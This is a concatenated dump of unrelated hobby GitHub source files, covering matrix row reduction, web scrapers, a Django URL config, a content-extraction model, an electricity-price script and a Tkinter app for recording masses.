Using Gaussian elimination, calculates and returns the row-echelon\n form of a matrix.\n\n Arguments\n - matrix: The matrix to row-reduce.\n \"\"\"\n\n # Adapted from:\n # https://en.wikipedia.org/wiki/Gaussian_elimination\n # #Pseudocode\n\n list_mat = matrix.elements\n lm_shape = matrix.shape\n row_count = lm_shape[0]\n col_count = lm_shape[1]\n pivot_row = 0\n pivot_col = 0\n det_sign = 1\n\n while pivot_row < row_count and pivot_col < col_count:\n max_row = max(\n (\n (abs(list_mat[i][pivot_col]), i)\n for i in range(pivot_row, row_count)\n ),\n key=lambda x: x[0],\n )[1]\n if list_mat[max_row][pivot_col] == Fraction(0):\n pivot_col += 1\n else:\n if max_row != pivot_row:\n list_mat[pivot_row], list_mat[max_row] = (\n list_mat[max_row],\n list_mat[pivot_row],\n )\n det_sign = -det_sign\n for row in range(pivot_row + 1, row_count):\n factor = (\n list_mat[row][pivot_col] / list_mat[pivot_row][pivot_col]\n )\n list_mat[row][pivot_col] = Fraction(0)\n for col in range(pivot_col + 1, col_count):\n list_mat[row][col] -= list_mat[pivot_row][col] * factor\n pivot_row += 1\n pivot_col += 1\n return Matrix(list_mat), det_sign\n\n\ndef _rref(\n matrix: Matrix,\n) -> Matrix:\n \"\"\"\n Using Gauss-Jordan elimination, calculates and returns the\n reduced row-echelon form of a matrix.\n\n Arguments\n - matrix: The matrix to row-reduce.\n \"\"\"\n\n # Adapted from:\n # https://en.wikipedia.org/wiki/Row_echelon_form\n # #Pseudocode_for_reduced_row_echelon_form\n\n list_mat = matrix.elements\n lm_shape = matrix.shape\n lead = 0\n row_count = lm_shape[0]\n col_count = lm_shape[1]\n for row in range(row_count):\n if col_count <= lead:\n return Matrix(list_mat)\n i = row\n while list_mat[i][lead] == Fraction(0):\n i += 1\n if row_count == i:\n i = row\n lead += 1\n if col_count == lead:\n return Matrix(list_mat)\n if i != row:\n list_mat[i], list_mat[row] = list_mat[row], list_mat[i]\n lead_val = list_mat[row][lead]\n for col in range(lm_shape[1]):\n list_mat[row][col] = list_mat[row][col] / lead_val\n for i in range(row_count):\n if i != row:\n lead_val = list_mat[i][lead]\n for col in range(lm_shape[1]):\n list_mat[i][col] = list_mat[i][col] - (\n lead_val * list_mat[row][col]\n )\n lead += 1\n return Matrix(list_mat)\n","repo_name":"B-Roux/momlib","sub_path":"momlib/_linalg.py","file_name":"_linalg.py","file_ext":"py","file_size_in_byte":18731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3159274007","text":"\ndef get_from_dict(dictionary, path, default=None):\n path = path.split(':')\n for key in path:\n try:\n dictionary = dictionary[key]\n except KeyError as e:\n if default is not None:\n return default\n raise KeyError(\n f\"config.yaml has not key '{path}' key '{e.args[0]}' is wrong.\")\n return dictionary\n","repo_name":"spannenberger/tsar_pipeline","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42346682974","text":"import pathlib\n\nfrom selenium import webdriver\n\nurl1 = 'https://www.matsmart.se/proteinprodukter'\nxpathPrice = \"//div[@class='product-item-price']//span[@class='product-price-title']\"\nxpathName = \"//div[@class='product-grid-item-container product-grid-item-label-header']//span[@class='label']\"\nxpathMultiPrice = \"//div[@class='product-item-price']//span[@class='product-item-multi-price-label']\"\n\nxpathShort = 
\"//div[@class='product-item-price']//div[@property='offers']\"\n\n\nclass matsmartItem:\n def __init__(self, name, price, mult=1):\n self.name = name\n self.price = price\n self.mult = mult\n\n\ndef __CHROMEDRIVER_PATH():\n \"\"\"Calculates the path to Chromedriver.exe. Chromedriver.exe is expected\n to be found as file in the same folder as this file.\n\n Returns:\n [type]: [description]\n \"\"\"\n filepath = pathlib.Path(__file__).parent.absolute()\n CHROMEDRIVER_PATH = str(filepath) + '/chromedriver.exe'\n return CHROMEDRIVER_PATH\n\n\ndef __initWebDriver():\n \"\"\"Returns a configured webdriver\n\n Returns:\n [type]: [description]\n \"\"\"\n driver = webdriver.Chrome(\n executable_path=__CHROMEDRIVER_PATH())\n return driver\n\n\ndef numberOfItems():\n driver = __initWebDriver()\n driver.get(url1)\n elements = driver.find_elements_by_xpath(xpathPrice)\n numberOfItems = len(elements)\n driver.close\n return numberOfItems\n\n\ndef getProducts():\n \"\"\"Returns a list containing all protein-products on matsmart site.\n\n\n Returns:\n [matsmartItem]: List of matsmartItem.\n \"\"\"\n driver1 = __initWebDriver()\n driver1.get(url1)\n\n elementsPrice = driver1.find_elements_by_xpath(xpathPrice)\n elementsName = driver1.find_elements_by_xpath(xpathName)\n elementsMulti = driver1.find_elements_by_xpath(xpathMultiPrice)\n\n reversedMulti = reversed(elementsMulti)\n multiIndexes = getIndexesOfMultiDeal()\n multiValues = getValuesOfMultiDeal()\n multiValues.reverse()\n\n numberOfItems = 0\n\n if(len(elementsName) == len(elementsPrice)):\n numberOfItems = len(elementsName)\n else:\n return ValueError\n\n listOfItems = []\n\n for i in range(numberOfItems):\n itemName = elementsName[i].text\n itemPrice = int(elementsPrice[i].text)\n if(i in multiIndexes):\n item = matsmartItem(itemName, itemPrice, multiValues.pop())\n else:\n item = matsmartItem(itemName, itemPrice)\n listOfItems.append(item)\n\n print(item.name + '\\n' + str(item.price) + '\\n' + str(item.mult))\n\n driver1.close()\n\n return listOfItems\n\n\ndef getNumberOfMultiDeals():\n driver1 = __initWebDriver()\n driver1.get(url1)\n elementsPrice = driver1.find_elements_by_xpath(xpathMultiPrice)\n\n print(len(elementsPrice))\n driver1.close()\n\n\ndef getIndexesOfMultiDeal():\n \"\"\"Returns a list containing the indexes of the multideals\n\n Returns:\n [list]: [description]\n \"\"\"\n driver1 = __initWebDriver()\n driver1.get(url1)\n elements = driver1.find_elements_by_xpath(xpathShort)\n\n listOfIndexes = []\n\n for index, element in enumerate(elements):\n if(\"product-item-multi-price-wrapper\" in element.get_attribute(\"class\")):\n listOfIndexes.append(index)\n driver1.close()\n return listOfIndexes\n\n\ndef getValuesOfMultiDeal():\n \"\"\"Returns a list containing the number of items\n needed for price to be accurate in a multideal\n\n Returns:\n List: List of int's\n \"\"\"\n driver1 = __initWebDriver()\n driver1.get(url1)\n elementsMulti = driver1.find_elements_by_xpath(xpathMultiPrice)\n valueList = []\n for i in elementsMulti:\n valueList.append(int(i.text[0]))\n\n driver1.close()\n return valueList\n","repo_name":"TwixiNature/ppkApi","sub_path":"webscraper/webscrapeMatsmart.py","file_name":"webscrapeMatsmart.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35705070289","text":"import time\nimport asyncio\nfrom pyppeteer import launch\n\n# Headless control\n\n# Launch webpage\nasync def launch_page():\n\tbrowser = await 
launch(headless=False, autoClose=False)\n\tpage = await browser.newPage()\n\tawait page.goto(\"https://www.youtube.com/watch?v=zVA1HfpksJ8\", timeout=100000000000)\n\treturn page\n\n# Click play/stop button\nasync def click_button(page):\n\tawait page.click(\".ytp-play-button.ytp-button\")","repo_name":"yujie-tao/touchless-ui","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"5798449151","text":"import asyncio\nimport sys\n\nimport mariadb\nfrom datetime import datetime\nfrom nonebot import logger, require\nfrom src.contests_services import codeforces, atcoder, nowcoder\n\n\ndef get_connect() -> mariadb.connection:\n \"\"\"\n 获取数据库的连接\n :return: 数据库的连接\n \"\"\"\n try:\n conn = mariadb.connect(\n user='bot',\n host='localhost',\n database='bot',\n passwd='robot',\n port=3306\n )\n except mariadb.Error as e:\n print(e)\n sys.exit(-1)\n\n return conn\n\n\nasync def __get_contest__(contest_type: str) -> list:\n \"\"\"\n 爬取各个平台的比赛\n\n 目前支持的平台:\n codeforces\n atcoder\n nowcoder\n\n :param contest_type:\n :return:\n \"\"\"\n if contest_type == 'codeforces':\n return await codeforces.get_contests()\n elif contest_type == 'atcoder':\n return await atcoder.get_contests()\n elif contest_type == 'nowcoder':\n return await nowcoder.get_contests()\n elif contest_type == '':\n s = []\n s.extend(await codeforces.get_contests())\n s.extend(await atcoder.get_contests())\n s.extend(await nowcoder.get_contests())\n return s\n\n return []\n\n\nasync def __update__(typename) -> bool:\n \"\"\"\n 更新比赛\n :param typename: 更新的比赛的类型\n :return:\n \"\"\"\n global connect\n contest = await __get_contest__(typename)\n status = False\n\n if len(contest) == 0:\n logger.warning(f'未获取{typename}最近的比赛')\n return status\n\n try:\n connect = get_connect()\n cur = connect.cursor()\n cur.execute(f\"TRUNCATE TABLE {typename}\")\n\n for x in contest:\n name = x['name']\n link = x['link']\n contest_time = list(map(str, x['contest_time']))\n data = {\n 'name': name,\n 'link': link,\n 'contest_time': contest_time\n }\n cur.execute(f'INSERT INTO {typename} (data) VALUES (\\\"{data}\\\")')\n status = True\n except mariadb.Error as e:\n print(e, file=sys.stderr)\n finally:\n connect.close()\n return status\n\n\nasync def update(typename) -> bool:\n if typename == '':\n return await __update__('codeforces') and \\\n await __update__('atcoder') and \\\n await __update__('nowcoder')\n elif typename == 'codeforces':\n return await __update__('codeforces')\n elif typename == 'atcoder':\n return await __update__('atcoder')\n elif typename == 'nowcoder':\n return await __update__('nowcoder')\n else:\n logger.error('unknown type when update recent contests')\n return False\n\n\nasync def pull_data(typename='') -> list:\n connect = get_connect()\n cur = connect.cursor()\n\n if typename != '':\n cur.execute(f'SELECT data FROM {typename}')\n else:\n cur.execute(f'SELECT data FROM codeforces')\n cur.execute(f'SELECT data FROM atcoder')\n cur.execute(f'SELECT data FROM nowcoder')\n data = []\n for i in cur:\n x = eval(i[0])\n x['contest_time'] = tuple(map(lambda it: datetime.strptime(it, '%Y-%m-%d %H:%M:%S'), x['contest_time']))\n data.append(x)\n connect.close()\n return data\n\n\nscheduler = require(\"nonebot_plugin_apscheduler\").scheduler\n\n\n@scheduler.scheduled_job(\"cron\", id=\"database_update\", hour='3')\nasync def database_update():\n await update('')\n\n\nif __name__ == '__main__':\n 
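# one-off refresh of the codeforces/atcoder/nowcoder tables when run directly\n 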
asyncio.run(update(''))\nelse:\n logger.info('update the contests data when launching the bot')\n asyncio.run(update(''))\n","repo_name":"FrankOu2001/codeforces_robot","sub_path":"src/contests_services/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41024682477","text":"from django.urls import path,re_path\nfrom hotel.views import*\nfrom hotel import views\n\nurlpatterns=[\n\t\tpath('roomadding/',Hotel.as_view(),name='roomadding'),\n\t\tpath('roomaddedlist/',HotelDetailList.as_view(),name=\"roomaddedlist\"),\n\t\tre_path(r\"^roomaddeddetail/(?P<pk>\\d+)$\",HotelDetailView.as_view(),name='roomaddeddetail'),\n\t\tre_path(r\"^roomaddedupdate/(?P<pk>\\d+)$\",HotelDetailUpdate.as_view(),name='roomaddedupdate'),\n\t\tpath('hotelregister/',views.addhotel, name='hotelregister'),\n \tpath(\"hotelregisterlist/\",HotelRegisterList.as_view(),name=\"hotelregisterlist\"),\n \tre_path(r\"^hotelregisterdetail/(?P<pk>\\d+)$\",HotelRegisterDetail.as_view(),name='hotelregisterdetail'),\n \tre_path(r\"^HotelRegisterUpdate/(?P<pk>\\d+)$\",HotelRegisterUpdate.as_view(),name=\"hotelregisterupdate\"),\n \tpath('hotelhome/',HotelHome.as_view(),name=\"hotelhome\"),\n \tpath(\"oderview/\",OrdersView.as_view(),name=\"oderview\"),\n \tpath('hprofile/',HotelProfile.as_view(),name='hprofile')\n\n]\n\n\n\n\n","repo_name":"mohammedarif98/BookmyRooms","sub_path":"hotel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5598348116","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nfrom .blocks import Blockifier\n\n\nclass IdentityPredictor(object):\n \"\"\"Mock out the machine learning model with an identity model.\"\"\"\n @staticmethod\n def predict(x):\n return x\n\n @staticmethod\n def fit(*args, **kargs):\n pass\n\n\nclass BaselinePredictor(object):\n \"\"\"Always predict content\"\"\"\n @staticmethod\n def predict(x):\n return np.ones(x.shape)\n\n @staticmethod\n def fit(*args, **kwargs):\n pass\n\n\ndef nofeatures(blocks, *args, **kwargs):\n return np.zeros((len(blocks), 1))\n\n\nclass ContentExtractionModel(object):\n \"\"\"Content extraction model\n\n Encapsulates a blockifier, some feature generators and a\n machine learning block model\n\n Implements analyze, make_features\"\"\"\n\n def __init__(self, blockifier, features, block_model, threshold=0.5):\n \"\"\"blockifier = implements blockify\n features = list of things that implement features interface\n block_model = sklearn interface model\"\"\"\n\n self._blockifier = blockifier\n self._features = features\n self._block_model = block_model\n self._threshold = threshold\n\n # check the features\n for f in self._features:\n if not callable(f):\n raise TypeError('All features must be callable')\n\n def set_threshold(self, thres):\n \"\"\"Set the threshold\n\n 0<= thres <= 1.0\"\"\"\n self._threshold = thres\n\n def analyze(self, s, blocks=False, encoding=None, parse_callback=None):\n \"\"\"\n Given an HTML string, extract just its main content or content+comments\n and return it as a string or as a sequence of blocks.\n\n Args:\n s (str): a single HTML document as a string\n blocks (bool): if True, return sequence of ``Block`` objects; if\n False, return combined text from all blocks\n encoding (str): the encoding used for ``s``; if None, the encoding\n is guessed based on the 
HTML's content\n parse_callback (Callable)\n\n Returns:\n str or List[``Block``]\n \"\"\"\n # blockify html into blocks\n blocks_ = self._blockifier.blockify(\n s, encoding=encoding, parse_callback=parse_callback)\n\n # make features, run model and return content\n return self.analyze_from_blocks(blocks_, return_blocks=blocks)\n\n def analyze_from_blocks(self, blocks, return_blocks=False):\n # make features\n features = self.make_features_from_blocks(blocks)\n\n # run model and select results\n if features is not None:\n content_mask = self._block_model.predict(features) > self._threshold\n results = [ele[0] for ele in zip(blocks, content_mask) if ele[1]]\n else:\n # doc is too short. return all content\n results = blocks\n\n if return_blocks:\n return results\n else:\n return ' '.join(blk.text for blk in results)\n\n def make_features_from_blocks(self, blocks, train=False):\n # doc needs to be at least three blocks, otherwise return everything\n if len(blocks) < 3:\n return None\n # compute the features\n return np.column_stack(tuple(f(blocks, train) for f in self._features))\n\n def make_features(self, s, train=False, encoding=None, parse_callback=None):\n \"\"\"s = HTML string\n return features, blocks\n\n raises BlockifyError if there is an error parsing the doc\n and None if doc is too short (< 3 blocks)\n\n train = if true, then passes it into feature maker\n \"\"\"\n # note: this method is not longer needed by ContentExtractionModel\n # but is kept for now for backward compatibilty with training code\n blocks = self._blockifier.blockify(\n s, encoding=encoding, parse_callback=parse_callback)\n return self.make_features_from_blocks(blocks, train), blocks\n\n @staticmethod\n def plot(blocks, content_mask):\n import pylab as plt\n\n fig = plt.figure(1)\n fig.clf()\n block_lengths = np.array([len(ele.text) for ele in blocks]) - 1.0\n block_lengths_content = block_lengths.copy()\n block_lengths_content[~np.array(content_mask)] = 0.0\n block_lengths_no_content = block_lengths.copy()\n block_lengths_no_content[content_mask] = 0.0\n\n plt.bar(np.arange(len(blocks)), block_lengths_no_content, 0.5)\n plt.bar(np.arange(len(blocks)), block_lengths_content, 0.5)\n\n fig.show()\n\n\nclass ContentCommentsExtractionModel(ContentExtractionModel):\n \"\"\"\n Run two models: a content only and a content + comments model\n on a document and return the output of both\n \"\"\"\n def __init__(self, blockifier, features,\n content_model, content_comments_model, threshold=0.5):\n self._blockifier = blockifier\n self._features = features\n self._content_model = content_model\n self._content_comments_model = content_comments_model\n self._threshold = threshold\n\n # check the features\n for f in self._features:\n if not callable(f):\n raise TypeError('All features must be callable')\n\n def analyze(self, s, blocks=False, encoding=None, parse_callback=None):\n \"\"\"\n Get the content and content+comments\n\n s = HTML string\n if encoding is not None, then this specifies the HTML string encoding.\n If None, then try to guess it.\n parse_callback: if not None then this is callable that is invoked\n with the parse tree\n\n if blocks is False then returns a tuple of strings:\n (main_content_string, main_content_and_comments_string)\n if blocks is True then returns a tuple of block instances:\n (list of main content blocks,\n list of main content and comments blocks)\n \"\"\"\n # just a wrapper around base class method for now\n # all the subclass specific logic is in analyze_from_blocks\n return 
super(ContentCommentsExtractionModel, self).analyze(\n s, blocks=blocks, encoding=encoding, parse_callback=parse_callback)\n\n def analyze_from_blocks(self, blocks_, return_blocks=False):\n features = self.make_features_from_blocks(blocks_)\n\n if features is not None:\n content_mask = self._content_model.predict(\n features) > self._threshold\n content_comments_mask = self._content_comments_model.predict(\n features) > self._threshold\n blocks_content = [\n ele[0] for ele in zip(blocks_, content_mask) if ele[1]]\n blocks_content_comments = [\n ele[0] for ele in zip(blocks_, content_comments_mask) if ele[1]]\n else:\n # doc is too short. return all content\n blocks_content = blocks_\n blocks_content_comments = blocks_\n\n if return_blocks:\n return (blocks_content, blocks_content_comments)\n else:\n return (\n ' '.join(blk.text for blk in blocks_content),\n ' '.join(blk.text for blk in blocks_content_comments)\n )\n\n\nclass SklearnWrapper(object):\n def __init__(self, skmodel):\n # skmodel implements predict_proba and has classes_ attribute\n self._skmodel = skmodel\n classes = list(skmodel.classes_)\n self._positive_idx = classes.index(1)\n\n def predict(self, X):\n return self._skmodel.predict_proba(X)[:, self._positive_idx]\n\nbaseline_model = ContentExtractionModel(Blockifier, [nofeatures], BaselinePredictor)\n","repo_name":"alexbui91/rubbishornot","sub_path":"dragnet/dragnet/content_extraction_model.py","file_name":"content_extraction_model.py","file_ext":"py","file_size_in_byte":7694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10426478549","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\nnumber = list(map(int, sys.stdin.readline().split()))\ncheck_list = [False] * n\narr = []\nnumber.sort()\n\n\ndef dfs(cnt):\n if cnt == m:\n print(*arr)\n elif cnt < m:\n for i in range(n):\n if check_list[i]:\n continue\n\n check_list[i] = True\n arr.append(number[i])\n dfs(cnt + 1)\n arr.pop()\n check_list[i] = False\n\n\ndef main():\n dfs(0)\n\n\nmain()","repo_name":"Mighty96/BOJ_Python","sub_path":"Class4/15650.py","file_name":"15650.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31771485910","text":"import requests\nimport json\nfrom datetime import datetime\nimport spot_price_tomorrow\n\n\n\ndef get_hourly_prices():\n prices = []\n for i in range(len(parse_json)):\n time = parse_json[i]['DateTime']\n time = simplify(time)\n price = parse_json[i]['PriceWithTax']\n values = {time: price}\n prices.append(values)\n\n return prices\n\ndef get_avg():\n total = 0\n # count starts at 1 so that, after the loop, count equals the number of prices summed\n for count, i in enumerate(range(len(parse_json)), start=1):\n info = parse_json[i]['PriceWithTax']\n total += info\n \n avg = total / count\n avg = round(avg, 4)\n return avg\n \ndef get_current_price():\n current_time = get_time()\n price_now = parse_json[current_time]['PriceWithTax']\n return price_now\n\ndef is_cheaper():\n avg = get_avg()\n current_price = get_current_price()\n\n if current_price <= avg:\n return True\n else: return False\n\ndef get_next_good_price():\n avg = get_avg()\n upcoming_prices = parse_json[get_time():]\n upcoming_good_prices = []\n for x in range(len(upcoming_prices)):\n if upcoming_prices[x]['PriceWithTax'] <= avg:\n price = simplify(upcoming_prices[x]['DateTime'])\n upcoming_good_prices.append(price)\n return upcoming_good_prices\n\ndef simplify(data):\n # DateTime is in YYYY-MM-DDTHH:MM:SS+TIMEZONE\n # get rid of date \n 
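# e.g. simplify(\"2023-05-01T14:30:00+03:00\") -> \"14:30\" (illustrative value)\n 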
time_and_date = data.split(\"T\")\n data = time_and_date[-1]\n # get rid of timezone and seconds\n time = ':'.join(data.split(\":\",2)[:2])\n data = time\n\n return data\n\ndef get_time():\n current_time = datetime.now().strftime(\"%H\")\n return int(current_time)\n\ndef compare_prices():\n today_avg = get_avg()\n tomorrow = spot_price_tomorrow.prices_revealed()\n\n print(\"-------------------\")\n print(\"Today's avg \" + str(today_avg))\n\n if(tomorrow):\n tomorrow_avg = spot_price_tomorrow.get_avg()\n print(\"Tomorrow's avg \" + str(tomorrow_avg))\n print(\"-------------------\")\n\n current_price = get_current_price()\n\n\n print(\"Price now: \" +str(current_price))\n if(tomorrow):\n tomorrow_price_same_time = spot_price_tomorrow.get_current_price()\n print(\"Price tomorrow at the same time: \" +str(tomorrow_price_same_time))\n print(\"-------------------\")\n \n upcoming_good_prices_today = get_next_good_price()\n \n for x in range(len(upcoming_good_prices_today)):\n print(\"Upcoming good prices today: \" +str(upcoming_good_prices_today[x]))\n if(tomorrow):\n upcoming_good_prices_tomorrow = spot_price_tomorrow.get_next_good_price()\n for x in range(len(upcoming_good_prices_tomorrow)):\n print(\"Upcoming good prices tomorrow: \" +str(upcoming_good_prices_tomorrow[x]))\n print(\"-------------------\")\n\ndef create_json():\n\n spot_price_json_today = {\n \"avg\" : get_avg(),\n \"current\" : get_current_price(),\n \"hourly\" : get_hourly_prices(),\n \"cheaper_than_avg\" : is_cheaper(),\n \"prices_for_tomorrow\": spot_price_tomorrow.prices_revealed()\n \n }\n\n if spot_price_tomorrow.prices_revealed():\n spot_price_tomorrow_json = {\n \"avg_tomorrow\" : spot_price_tomorrow.get_avg(),\n \"current_tomorrow\" : spot_price_tomorrow.get_current_price(),\n \"hourly_tomorrow\" : spot_price_tomorrow.get_hourly_prices(),\n \"cheaper_than_avg_tomorrow\" : spot_price_tomorrow.is_cheaper(),\n \n }\n\n spot_price_json = {**spot_price_json_today, **spot_price_tomorrow_json}\n spot_price_json = json.dumps(spot_price_json, indent=4)\n \n else:\n spot_price_json = json.dumps(spot_price_json_today, indent=4)\n\n return spot_price_json\n \ndef push_json(data):\n \n with open('../data/price_data.json', 'w') as f:\n f.write(data)\n\n\ndef main():\n \n response_API = requests.get('https://api.spot-hinta.fi/Today')\n #response_API.raise_for_status()\n data = response_API.text\n global parse_json\n parse_json = json.loads(data)\n \n data = create_json()\n push_json(data)\nif __name__ == \"__main__\":\n main()","repo_name":"meekku/eOpt2023","sub_path":"data/spot_price_today.py","file_name":"spot_price_today.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1094723219","text":"print(\"*****Selection Sort*****\\n\")\r\nprint(\"1. 
Sorting In Ascending Order\\n2.Sorting in Descending Order\\n\")\r\ns=input(\"Enter Your Choice:\\n\")\r\niList=list(map(int,input(\"Enter Elements\\n\").split()))\r\nprint(\"Given List:\\n\",iList)\r\n\r\nif s=='1':\r\n for i in range(len(iList)):\r\n minValue=min(iList[i:])\r\n indexMinValue=iList.index(minValue,i)\r\n iList[i],iList[indexMinValue]= iList[indexMinValue],iList[i]\r\nelse:\r\n for i in range(len(iList)):\r\n maxValue=max(iList[i:])\r\n indexMaxValue=iList.index(maxValue,i)\r\n iList[i],iList[indexMaxValue]= iList[indexMaxValue],iList[i]\r\n \r\nprint(\"Sorted List:\\n\",iList)\r\n","repo_name":"NirajPatel07/Algorithms-Python","sub_path":"SelectionSort.py","file_name":"SelectionSort.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27664706109","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport reportlab\nimport sqlite3\nimport pandas as pd\nimport os, sys, subprocess\n\n\nfrom tkinter import ttk\n#importare prima ttkwidgets\nfrom ttkwidgets.autocomplete import AutocompleteEntry\nfrom ttkwidgets.autocomplete import AutocompleteCombobox\n\n\nfrom openpyxl.styles import Font, Alignment\nfrom openpyxl.styles import Side, Border\n\nfrom openpyxl import styles, formatting\nimport pandas as pd\nimport numpy as np\n\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\nfrom openpyxl.styles import NamedStyle, Font, Alignment, Border, Side, PatternFill\nfrom openpyxl.drawing.image import Image\n\nfrom openpyxl.utils.dataframe import dataframe_to_rows\nfrom openpyxl.worksheet.worksheet import Worksheet\n\n# Leggi il file xlsx e trasformalo in dataframe impostando i nomi colonna\nfrom openpyxl.worksheet.worksheet import Worksheet\n\nfrom xlsxwriter.utility import xl_rowcol_to_cell\nfrom pandastable import Table, TableModel, config\n\n######################################################################\n######## FUNZIONE CONNESSIONE AL DATABASE 'database_conti' ###########\n######################################################################\ndef connessione():\n conn = sqlite3.connect('database_messe_orizzontale')\n\n cur = conn.cursor()\n try:\n cur.execute('''CREATE TABLE TABLE_Messe(ID integer not null PRIMARY KEY ,\n Anno integer not null ,\n Mese TEXT not null ,\n Nome_Celebrante TEXT not null ,\n Ad_Mentem integer not null ,\n Binate integer,\n Binate_Concelebrate integer,\n Trinate integer,\n Suffragi_Comunitari integer,\n Suffragi_Personali integer,\n Devozione integer,\n Benefattori integer,\n Pro_Populo integer)''')\n\n except:\n pass\n\n try:\n cur.execute('''CREATE TABLE TABLE_Celebranti(ID integer not null PRIMARY KEY ,\n Celebranti TEXT not null )''')\n except:\n pass\n\n try:\n cur.execute('''CREATE TABLE TABLE_Suffragi(ID integer not null PRIMARY KEY ,\n Anno integer not null ,\n Mese TEXT not null ,\n Suffragi TEXT not null )''')\n except:\n pass\n\n print(conn)\n print('Sei connesso al database_conti')\n conn.commit()\n conn.close()\n\n\nconnessione()\n\n############################\n######## TKINTER ###########\n############################\n\nroot = Tk()\n\n# DEFINISCO le dimensioni della GUI e il TITOLO nella barra superiore\nheight = 950 # altezza\nwidth = 1680 # larghezza\ntop = 0\nleft = (root.winfo_screenwidth() - width) / 2\ngeometry = (\"{}x{}+{}+{}\".format(width, height, int(left), int(top)))\nroot.geometry(geometry)\nroot.resizable(0, 0)\nroot.title('Registro Messe')\n\nforeground_Bianco = 
'#ffeddb'\nbackground_Blu = 'blue'\n# Label title\ntitle = Label(root, text='Registro Messe', font=('verdana', 40, 'bold'), bg=background_Blu, fg=foreground_Bianco)\ntitle.pack(side=TOP, fill=X)\n\n###################################\n######## TKINTER frames ###########\n###################################\n\n# Frame Combo - Top\nFrame_combo = Frame(root, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_combo.place(x=5, y=73, width=1670, height=60)\n\n# Frame Treeview - treeview right Frame\nFrame_tree = Frame(root, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_tree.place(x=5, y=132, width=1570, height=335)\nFrame_tree_Buttons= Frame(root, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_tree_Buttons.place(x=1575, y=132, width=100, height=335)\n\n\n#\nFrame_pandastable = Frame(root, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_pandastable.place(x=5, y=467, width=1670, height=480)\n\n# Frame Update - update right Frame\nFrame_Suffragi = Frame(Frame_pandastable, bd='4', bg=background_Blu, relief=RIDGE)\nFrame_Suffragi.place(x=0, y=0, width=470, height=473)\n\n\n###############################################\n######## TKINTER ENTRY Frame_combo ############\n###############################################\nEntry_Anno_combo_IntVar = IntVar()\nEntry_Mese_combo_StringVar = StringVar()\nEntry_Nome_Celebrante_combo_StringVar = StringVar()\nEntry_Ad_Mentem_combo_IntVar = IntVar()\nEntry_Binate_combo_IntVar = IntVar()\nEntry_Binate_Conc_combo_IntVar = IntVar()\nEntry_Trinate_combo_IntVar = IntVar()\nEntry_Suffragi_Comunitari_combo_IntVar = IntVar()\nEntry_Suffragi_Personali_combo_IntVar = IntVar()\nEntry_Devozione_combo_IntVar = IntVar()\nEntry_Benefattori_combo_IntVar = IntVar()\nEntry_Pro_Populo_combo_IntVar = IntVar()\n\n\nLabel_TOTALE_Numero_Messe= Label(Frame_combo, text=' ', font=('verdana', 8, 'bold'),\n bg=background_Blu, fg=foreground_Bianco)\nLabel_TOTALE_Numero_Messe.grid(row=2, column=12, columnspan=2, padx=40, pady=10)\n\n\ndef trace_when_Entry_widget_is_updated(self, *args):\n try:\n Label_TOTALE_Numero_Messe.config(text=' ', font=('verdana', 16, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n value = Entry_Ad_Mentem_combo_IntVar.get()+\\\n Entry_Binate_combo_IntVar.get()+\\\n Entry_Binate_Conc_combo_IntVar.get()+\\\n Entry_Trinate_combo_IntVar.get()+\\\n Entry_Suffragi_Comunitari_combo_IntVar.get()+\\\n Entry_Suffragi_Personali_combo_IntVar.get()+\\\n Entry_Devozione_combo_IntVar.get()+\\\n Entry_Benefattori_combo_IntVar.get()+\\\n Entry_Pro_Populo_combo_IntVar.get()\n\n text = \"{}\".format(value) if value else \" \"\n Label_TOTALE_Numero_Messe.config(text=text)\n\n except:\n pass\n\n\nEntry_Anno_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Mese_combo_StringVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Nome_Celebrante_combo_StringVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Ad_Mentem_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Binate_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Binate_Conc_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Trinate_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Suffragi_Comunitari_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Suffragi_Personali_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Devozione_combo_IntVar.trace_variable('w', 
